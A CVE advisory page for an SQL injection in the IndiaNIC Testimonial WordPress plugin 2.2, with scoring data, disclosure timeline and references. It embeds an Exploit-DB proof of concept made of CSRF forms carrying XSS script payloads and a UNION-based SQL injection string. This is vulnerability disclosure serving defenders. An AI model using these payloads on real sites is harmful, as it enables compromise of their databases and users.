CVE-2013-5673 : Detail

CVE-2013-5673

SQL Injection
A03-Injection
1.36%V3
Network
2013-09-10
17h00 +00:00
2017-08-28
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in testimonial.php in the IndiaNIC Testimonial plugin 2.2 for WordPress allows remote attackers to execute arbitrary SQL commands via the custom_query parameter in a testimonial_add action to wp-admin/admin-ajax.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 28054

Publication date : 2013-09-02 22h00 +00:00
Author : RogueCoder
EDB Verified : No

Details ======================== Application: Testimonial Version: 2.2 Type: Wordpress plugin Vendor: IndiaNIC Vulnerability: - XSS (CWE-79) - CSRF (CWE-352) - SQL Injection (CWE-89) Description ======================== Testimonial Plugin allows you to add, delete, edit and place what others said about your web site. Loaded with unequaled features, this plugin gets you complete control over testimonials. This is the very first Plug-in which is designed especially keeping our motto in mind that ‘every client is important’. It is as an imperative tool for supervising your official website in accordance to your clients. Vulnerability ======================== This plugin is vulnerable to cross-site request forgery, cross-site scripting and sql injection. 1. Add testimonial form is vulnerable to CSRF and XSS 2. Add listings template is vulnerable to CSRF, XSS and SQLi 3. Add widget template is vulnerable to CSRF and XSS Proof of Concept ======================== 1. Add testimonial <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save"> <input type="hidden" name="project_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="project_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>"> <input type="hidden" name="client_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>"> <input type="hidden" name="client_city" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>"> <input type="hidden" name="client_state" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>"> <input type="hidden" name="client_country" value="Belgium"> <input type="hidden" name="description" value="<script>alert(String.fromCharCode(67,83,82,70,32,54))</script>"> <input type="hidden" name="tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,55))</script>"> <input type="hidden" name="video_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,56))</script>"> <input type="hidden" name="is_featured" value="<script>alert(String.fromCharCode(67,83,82,70,32,57))</script>"> <input type="submit" value="Save Testimonial"> </form> 2. Add listings template <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save_listing_template"> <input type="hidden" name="id" value="9"> <input type="hidden" name="title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="no_of_testimonial" value="5"> <input type="hidden" name="list_per_page" value="5"> <input type="hidden" name="ord_by" value="id"> <input type="hidden" name="ord_type" value="ASC"> <input type="hidden" name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#"> <input type="hidden" name="show_featured_at" value="top"> <input type="hidden" name="no_of_featured" value="2"> <input type="hidden" name="featured_template" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="hidden" name="listing_template_odd" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="hidden" name="listing_template_even" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="submit" value="Add Template"> </form> 3. Add widget template <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save_widget"> <input type="hidden" name="widget_title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="no_of_testimonials" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>"> <input type="hidden" name="filter_by_country" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>"> <input type="hidden" name="filter_by_tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>"> <input type="hidden" name="widget_template" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>"> <input type="submit" value="Add Template"> </form> Solution ======================== No patch has been provided by vendor. Solution would be to stop using this plugin in a public environment Timeline ======================== 2013-08-07 - Email sent to IndiaNIC 2013-08-08 - Notification left on the plugin's Support board on wordpress.org 2013-09-01 - No response or patch released. Publicly disclosed

Products Mentioned

Configuraton 0

Indianic>>Testimonial_plugin >> Version 2.2

Wordpress>>Wordpress >> Version -

References

http://osvdb.org/96793
Tags : vdb-entry, x_refsource_OSVDB
http://seclists.org/fulldisclosure/2013/Sep/5
Tags : mailing-list, x_refsource_FULLDISC
http://seclists.org/oss-sec/2013/q3/531
Tags : mailing-list, x_refsource_MLIST
http://www.exploit-db.com/exploits/28054
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/62108
Tags : vdb-entry, x_refsource_BID